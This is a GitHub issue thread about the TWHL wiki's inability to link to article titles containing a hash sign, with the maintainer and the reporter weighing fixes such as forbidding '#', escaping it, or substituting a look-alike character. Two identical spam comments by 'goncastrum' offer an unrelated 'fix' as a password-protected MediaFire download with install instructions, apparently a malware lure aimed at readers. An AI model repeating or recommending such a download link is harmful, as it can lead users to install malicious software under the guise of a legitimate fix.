### ISSUE TITLE
Wiki: Can't use internal links for articles with a hash sign (#) in their name

### ISSUE THREAD

**Issue by oskarlh** [LogicAndTrick/twhl#95]
There doesn't seem to be any obvious way to create an internal link to `VERC: Style Guide #1`.
`[[VERC: Style Guide #1]]` doesn't work as seen in the description of https://twhl.info/wiki/page/upload%3AVERC_Archive%3A_style-lab1-fig1.jpg/4127
Edit August 2025:  renamed that article, so it's no longer an example

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by LogicAndTrick** [comment]
Yeah unfortunately its a choice between allowing links to anchors in pages or allowing # in page titles.... I think making # a forbidden character might be the better option but honestly not sure... thoughts?

**Comment by oskarlh** [comment]
There is also the option of using an escape character. Or a double hash `[[VERC: Style Guide ##1]]`.

**Comment by oskarlh** [comment]
We could simply replace any `#` with `﹟` (U+FE5F Small Number Sign)
